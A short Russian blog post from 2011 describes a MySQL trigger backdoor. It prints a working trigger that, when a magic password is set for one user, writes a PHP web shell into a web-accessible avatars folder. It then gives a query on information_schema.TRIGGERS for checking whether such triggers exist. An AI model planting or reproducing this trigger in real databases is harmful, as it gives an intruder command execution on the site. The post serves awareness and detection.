Архив ‘PHP’ Категории

Бэкдор с триггерах субд О_о

29 августа, 2011 | 2 комментария

ацкая штука:

delimiter |
CREATE TRIGGER backdoor AFTER UPDATE ON users
FOR EACH ROW label:BEGIN
IF (SELECT password FROM users WHERE id=123)='gimme_that_shell' THEN
SELECT '<?=`$c`?>' INTO OUTFILE '/home/site/httpdocs/avators/smile.php';
ELSE
LEAVE label;
END IF;
END;

Срочно делайте:

SELECT * FROM information_schema.TRIGGERS

=)

подробнее http://raz0r.name/mysli/backdoor-in-trigger/